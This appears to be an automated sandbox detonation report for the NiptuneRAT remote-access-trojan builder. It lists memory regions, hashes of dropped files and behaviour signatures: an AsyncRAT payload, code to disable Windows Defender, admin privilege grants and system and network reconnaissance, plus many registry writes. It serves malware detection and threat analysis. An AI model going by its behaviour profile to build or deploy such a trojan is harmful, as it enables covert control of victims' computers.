memory/3600-190-0x00007FFD732B0000-0x00007FFD73D71000-memory.dmp
memory/4896-191-0x0000027CF7410000-0x0000027CF74E6000-memory.dmp
memory/4896-195-0x0000027CF9210000-0x0000027CF9230000-memory.dmp
memory/4896-196-0x00007FFD732B0000-0x00007FFD73D71000-memory.dmp
memory/4896-198-0x0000027CF9230000-0x0000027CF9250000-memory.dmp
memory/3600-201-0x00000189D8030000-0x00000189D8040000-memory.dmp
memory/4896-200-0x0000027CF9AF0000-0x0000027CF9B0E000-memory.dmp
memory/4896-204-0x0000027CF9C80000-0x0000027CF9CEE000-memory.dmp
memory/4896-206-0x0000027CF9F10000-0x0000027CFA124000-memory.dmp
memory/4896-202-0x0000027CF9AE0000-0x0000027CF9AF0000-memory.dmp
memory/4896-208-0x0000027CFA360000-0x0000027CFA3BA000-memory.dmp
memory/4896-210-0x0000027CFA310000-0x0000027CFA31E000-memory.dmp
memory/4896-213-0x0000027CFB100000-0x0000027CFB24A000-memory.dmp
memory/4896-214-0x0000027CFAFB0000-0x0000027CFB0C6000-memory.dmp
memory/4896-215-0x0000027CF9AB0000-0x0000027CF9AE0000-memory.dmp
memory/3600-217-0x00000189D8030000-0x00000189D8040000-memory.dmp
memory/4896-218-0x0000027CF9AE0000-0x0000027CF9AF0000-memory.dmp
memory/4896-219-0x0000027CF9AE0000-0x0000027CF9AF0000-memory.dmp
memory/3600-220-0x00000189D8030000-0x00000189D8040000-memory.dmp
memory/4896-222-0x00007FFD732B0000-0x00007FFD73D71000-memory.dmp
memory/3600-223-0x00000189D8030000-0x00000189D8040000-memory.dmp
C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneBinder.exe
| MD5 | ab9b9dac5c176d3f525400aa7b58a078 |
| SHA1 | c7b22490b94d46ed0287c4b6ece08e96e7103516 |
| SHA256 | 6d9da9ac899fdac6a9436922be389ef3bd124f4657fea6332c2ccd3fc33613d4 |
| SHA512 | 649032f0046778fa63e7878ade222de7a061162b6da4670970ace517d2c2212f80dff2fd5a5f2d9c25324a89c5af0927022c1ec24f726da92a669cd232b8ec16 |
memory/1560-226-0x00007FFD6B680000-0x00007FFD6C021000-memory.dmp
memory/1560-227-0x0000000000F80000-0x0000000000F90000-memory.dmp
memory/1560-228-0x000000001BC10000-0x000000001C0DE000-memory.dmp
memory/1560-229-0x00007FFD6B680000-0x00007FFD6C021000-memory.dmp
memory/1560-230-0x000000001B5F0000-0x000000001B68C000-memory.dmp
memory/1560-231-0x0000000000FD0000-0x0000000000FD8000-memory.dmp
memory/1560-232-0x0000000000F80000-0x0000000000F90000-memory.dmp
memory/1560-234-0x0000000000F80000-0x0000000000F90000-memory.dmp
memory/1560-235-0x00007FFD6B680000-0x00007FFD6C021000-memory.dmp
memory/3600-236-0x00000189D8030000-0x00000189D8040000-memory.dmp
memory/3600-237-0x00000189FE3B0000-0x00000189FE4CE000-memory.dmp
C:\Users\Admin\Desktop\NiptuneRAT-main\Stub\Stub.exe
| MD5 | 0da861f192f8e722505826c141c05a40 |
| SHA1 | 4d717f9d2a64caf68374ed1e246cf38dd208227b |
| SHA256 | 4c6a73271e3a0794bff16fa39b45771e9e39b873e12fdc7031e03fbda238667b |
| SHA512 | 7b61ac15ba95e0b8a9ebac2f33e7137083b18204de503e7a2946af65e9d5b6ad9e826a27770e10862dc825f3e20e8bd72463593528a623c4603f9628f8c27280 |
C:\Users\Admin\Desktop\NiptuneRAT-main\Usrs.p12
| MD5 | 87f8c46f0f27b967b543ab554c061dbd |
| SHA1 | 78c88f30a8c3638b9c61d4c8044a9e4f8d7b00d3 |
| SHA256 | adf158702858e96c9003d5ab5115c6a1e71cdce8a82377e0d6c6e63edfb52239 |
| SHA512 | b289e2cf36684dad0f47cacd8716582e176ad71720f7a00fc508ec6eeb0266cdfcf58c7c62cddf4e0a03dc0fbe60e3a9c76da820eccf73f8c9a669252c17422c |
C:\Users\Admin\AppData\Local\NiptuneRAT\NiptuneRAT.exe_Url_2virb1mjsp4und03eye3evhna3xsy40a\4.1.0.0\user.config
| MD5 | 77d636e08fe9de62cf19ad656409ccde |
| SHA1 | 827de958d0c46346c9c581be646b8c3a61fab648 |
| SHA256 | 4155b94bb3ef65ff1f15d7f337f2ada62d474ec5ba7557562618e5206e83a558 |
| SHA512 | 60712d620a884d897457f56d4ecc758c9a753c31f58fcb9d814af58dbc2e105435c9a73f837b4146e2e8edb7834b83f51dcecaaf39cd6f69be59d7bb5c28b839 |
C:\Users\Admin\AppData\Local\NiptuneRAT\NiptuneRAT.exe_Url_2virb1mjsp4und03eye3evhna3xsy40a\4.1.0.0\user.config
| MD5 | 67ae3b067855a1e16f01e16ee389c8f0 |
| SHA1 | 3bef83c7922cda26497a45bbfe209e65b14234a0 |
| SHA256 | 07e9e4841eeace951264cf7b4cf5e8c6993fc923b851cb2360122fe7fec2ef0a |
| SHA512 | db73d3a4a9523db12264d1cf53e50d44589af8dc83bdbb041eff8977f6134666d1836014ebde472039036a13beabe6adee026712f385453ed654ae5ac504e699 |
C:\Users\Admin\Desktop\$77NiptuneClient.exe
| MD5 | 9a545e9134023055aa55309e62f77a80 |
| SHA1 | 8f663c9816f8610676f4fc101cb6f31c21117d47 |
| SHA256 | 75bbbbeca7b8b6831e6bd91b7b7256c30a50de3369965f1866434a924f4c362e |
| SHA512 | d5d4dd237a03218d7c95f14160151e41adb89dd26192114efd9cc2b915e5fc006f2f4e2bf859c6cc1246f0584aa5f344d6b9525f3d31650719e8d4b66d838526 |
memory/2396-272-0x0000000000510000-0x0000000000526000-memory.dmp
memory/3600-273-0x00000189D8030000-0x00000189D8040000-memory.dmp
memory/2396-274-0x00007FFD732B0000-0x00007FFD73D71000-memory.dmp
memory/2396-275-0x000000001B2F0000-0x000000001B300000-memory.dmp
memory/2396-276-0x00007FFD948D0000-0x00007FFD94AC5000-memory.dmp
memory/2396-281-0x00007FFD732B0000-0x00007FFD73D71000-memory.dmp
memory/2396-282-0x00007FFD948D0000-0x00007FFD94AC5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tmpD3B1.tmp.bat
| MD5 | 7352cc373f53964e85cee69d5e6a96d5 |
| SHA1 | 267c8a9098dd1d4842f052126ea14b1f7fc8c973 |
| SHA256 | 4397f51ac52f558c35fa9181fe7519cdef892bf26d99af375fff5f50cdaaa346 |
| SHA512 | 78826b32baa2c2c5eec0ffbe3f0c65dfc5cf9b270f4ce0174bda794a2c881858fd1ee0a7fba10af952ee3e14609095c2b24046dc6575de9dcddf513d4e4d2c73 |
memory/3304-284-0x0000025878860000-0x0000025878882000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nm1hmjww.bcx.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3304-294-0x00007FFD732B0000-0x00007FFD73D71000-memory.dmp
memory/3304-295-0x00000258787E0000-0x00000258787F0000-memory.dmp
memory/3304-296-0x00000258787E0000-0x00000258787F0000-memory.dmp
memory/3304-297-0x0000025879020000-0x00000258791E2000-memory.dmp
memory/2320-308-0x0000017424DB0000-0x0000017424DC0000-memory.dmp
memory/2320-309-0x0000017424DB0000-0x0000017424DC0000-memory.dmp
memory/2320-307-0x00007FFD732B0000-0x00007FFD73D71000-memory.dmp
memory/2320-310-0x0000017425C40000-0x0000017426168000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\$77APCONSVC.EXE
| MD5 | 0ccb78c036b77af2a02939c10863d0fc |
| SHA1 | 77b58cc239c67abf271a7e68c10592a8a4d5bae1 |
| SHA256 | 555e0c40af959eb3c9be32197ebf39aea443fe672086e004cc0141296de67d7a |
| SHA512 | 29f194f6118f558a31515538d758934d59959a9aeed1a2ae9e929b762166843a4433b10b0f5ded0698c141d36fc12ae54860ecbb8d36ba6ca2f92cb946f39a5c |
memory/2320-324-0x00000174250C0000-0x000001742520E000-memory.dmp
memory/4656-325-0x0000000000840000-0x0000000000874000-memory.dmp
memory/2320-326-0x00007FFD732B0000-0x00007FFD73D71000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | f62a904508f640cf7a29c69cdda7ed8e |
| SHA1 | 79e4bd22e96aa94c783f5521b5b2a549c58ed24f |
| SHA256 | 1c68a8d5fb2a3d57a9eaeb1e64cc457f3f4e268a54cbf8aeaf5084fd401e59bc |
| SHA512 | 0a5bdaf832544123470af0204145dc38830dbbf0e8b6623b89bbaca5970e5c0506356e4ad9d9a589bd3394768ff949215c3fea2d2542da16ffb60708c0f2c544 |
memory/3304-334-0x0000025878990000-0x0000025878ADE000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 12b1823a0956e972f95e397d4ca5a91f |
| SHA1 | 1ad092456da4540400fd58788bc40a353b17e295 |
| SHA256 | 0096655234a74760fbeb882149ad2513be4c9782e1e8ca86968e61b9f88c5230 |
| SHA512 | 1bd8aa4179650510689ec523492c2327a61095c28266548d89512bc69b5b9b8416023e957a1ddfeefb51de2d403f525ee0535f850147b022568c44197fbcbcde |
C:\Users\Admin\AppData\Local\Temp\$77SYSTEM.exe
| MD5 | 152e3f07bbaf88fb8b097ba05a60df6e |
| SHA1 | c4638921bb140e7b6a722d7c4d88afa7ed4e55c8 |
| SHA256 | a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc |
| SHA512 | 2fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4 |
C:\Users\Admin\AppData\Local\Temp\$77TCPSVCS.EXE
| MD5 | 39b931afd01be1f696c515a83b789445 |
| SHA1 | 790083c555276c9cca5bf7a9532fd99f79b80a90 |
| SHA256 | e9db26ffe8f05c133a7c541ccd7eafa63b64806a84e4e5866fc735e5dc4ab93d |
| SHA512 | 0961ea8fa2b23f2c2631db074a2271d37bec1844496796ec116c649245423b7e7da29b9a626c3c6406a65f9812550f09f089babee9fe805dcf311f6d7bda9592 |
memory/4936-376-0x00007FFD948D0000-0x00007FFD94AC5000-memory.dmp
memory/4936-377-0x00007FFD93D10000-0x00007FFD93DCE000-memory.dmp
memory/3728-382-0x0000000140000000-0x0000000140008000-memory.dmp
memory/3728-384-0x0000000140000000-0x0000000140008000-memory.dmp
memory/3728-380-0x0000000140000000-0x0000000140008000-memory.dmp
memory/3728-379-0x0000000140000000-0x0000000140008000-memory.dmp
memory/3728-378-0x0000000140000000-0x0000000140008000-memory.dmp
memory/3728-385-0x00007FFD948D0000-0x00007FFD94AC5000-memory.dmp
memory/3728-387-0x00007FFD93D10000-0x00007FFD93DCE000-memory.dmp
memory/4936-389-0x000001BEFBB50000-0x000001BEFBC9E000-memory.dmp
memory/3728-390-0x0000000140000000-0x0000000140008000-memory.dmp
memory/620-393-0x0000024140D40000-0x0000024140D65000-memory.dmp
memory/620-395-0x0000024140D70000-0x0000024140D9B000-memory.dmp
memory/620-396-0x0000024140D70000-0x0000024140D9B000-memory.dmp
memory/620-405-0x00007FFD54950000-0x00007FFD54960000-memory.dmp
memory/620-404-0x0000024140D70000-0x0000024140D9B000-memory.dmp
memory/676-411-0x000001D8F01B0000-0x000001D8F01DB000-memory.dmp
memory/952-422-0x000001A5D9FA0000-0x000001A5D9FCB000-memory.dmp
memory/676-431-0x000001D8F01B0000-0x000001D8F01DB000-memory.dmp
memory/388-430-0x000002A8F8180000-0x000002A8F81AB000-memory.dmp
memory/676-437-0x00007FFD54950000-0x00007FFD54960000-memory.dmp
memory/908-445-0x000001D4ED7B0000-0x000001D4ED7DB000-memory.dmp
C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\G3nl0mDcABnDuZ.dll
| MD5 | 97b8bec4c47286e333cc2bedacf7338e |
| SHA1 | 764bbd0307924b71ca89538b42996208d10c9b91 |
| SHA256 | 060d467cbeb0a58696287c052f3dd9b3597331b1c812e3e2882d6c232f8511de |
| SHA512 | a40970622a594533349e75fc2022314ba21f05fc82709d6eaba82f4a2bc343c960029ad2825cfc034ce82622722127d149993bff88982f02d6dd6b5b1fb60fbf |
C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\FBSyChwp.dll
| MD5 | 0d41ccfaa8e7ef96248b8270d1a44d08 |
| SHA1 | 6ee22bdb91d3a18e0b45b6590eb69bc9a0b02326 |
| SHA256 | 0ea38d0d964815e2b84748a78bd5a829ae01586478e5f17b976f1ae763c8dec3 |
| SHA512 | a0f236f6dbeb1763fb1c198616de65b907a3a5edf7ed9435c2ad0b5826d84e9d2f25e96aba4e8b681ef495612cf0e04e929427a92d332164ace89e797bcb0e0e |
C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\EVa7gBMKoaHmLC.dll
| MD5 | 64a3d908b8a5feff2bccfc67f3a67dbd |
| SHA1 | a17d7e5fa57c99a067cac459cb507b625dac254e |
| SHA256 | 6ea1ae7ab496666c0117fc20e704bfb6104b13cfb0408073a09689f863fa64b1 |
| SHA512 | 66374d720230799bea6ac6cfe3faadc37fd775a49d40c04facae1caf1ec658956bbda54ba75287d7128b19b97971bd933a64469da8e0884225c5a8d8b9423ccc |
C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Audio.dll
| MD5 | 8105f5149e1fea72e27f0a1455d956bc |
| SHA1 | 6722d54df38b89284c3375efda3985155e6f5b8e |
| SHA256 | 9b73be7a27b5aa8cabf10c79a6e515db6b59962cad3945dada2eff57bb56bfdf |
| SHA512 | 4f1aaa81263bb17aa7b495cab056fd9b18058247df874866bd9cb6247f180989a0d549ce0b4595c7a636e4d6279e92004c4f159c30e8b381a1a51b9d54a84d10 |
C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\59Zp7paEHDF7luJ.dll
| MD5 | 86cbe0f36426982c534746743f4a4dfe |
| SHA1 | 04dd3bf828b36ae75bfda0edc67693b59801e9b5 |
| SHA256 | 972261dfbdd76a5b99d2922a018c5c809ddb195c4f44312bb1da496c9c28df44 |
| SHA512 | 1cd164585caa0c5f64e567d24f9e4f9c4a4f79fb1e8da83ef8a635d6ad5e2f6ebcf2c813371b4cd53ea94e0d36f8a04fa2b2acf3f35570ff57450d6503fc31a4 |
C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\0guo3zbo66fqoG.dll
| MD5 | e4ebcf76ff80ef398d3ab77d577f4c08 |
| SHA1 | cb9e6b30a63d50ae87610f6855b64abfb25691d2 |
| SHA256 | 9661b1abc9a3e95e591c49c3838a64a066a2ff3c6de08d8aa7b541c4a75cd8e5 |
| SHA512 | 8f37cedd987dd14181fdfa861b8a95271868dac21aa9df80bd6daa831ae20f4b4965c8be3e36f32aa220bd37ded11a7568ae237c9c9641bb4fc087f6fe104b01 |
C:\Users\Admin\AppData\Local\Temp\Log.tmp
| MD5 | 3e79e497a1c8dff282c0e281a8ac4238 |
| SHA1 | ca25ecd92033c4789f61dbbd0e782eac581a091c |
| SHA256 | edadb040867aacdc83bad794bdd55232320bb00ee4957b2217da614b26f158ea |
| SHA512 | 98cff43d464e17f18f7252f80e3f1105f4f048f83895ddca2e72c0b77dbe406ec104939737841e71eeb005e4ac83f7b6fb3789b115e2b0d91d78662009fe33d6 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-03-17 21:41
Reported
2024-03-17 21:52
Platform
win11-20240221-en
Max time kernel
440s
Max time network
454s
Command Line
Signatures
AsyncRat
Contains code to disable Windows Defender
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Grants admin privileges
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\$77NiptuneClient.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Enumerates physical storage devices
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\NETSTAT.EXE | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\2\NodeSlot = "9" | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202 | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\NodeSlot = "8" | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\1\0\MRUListEx = ffffffff | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\1 | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202020202 | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202 | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\1\0 | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\1 | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\SniffedFolderType = "Generic" | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7 | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\1\0 = 6800310000000000715814ae10004e495054554e7e310000500009000400efbe715801ae715814ae2e000000dca70200000006000000000000000000000000000000796af6004e0069007000740075006e0065005200410054002d006d00610069006e00000018000000 | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202 | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "6" | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
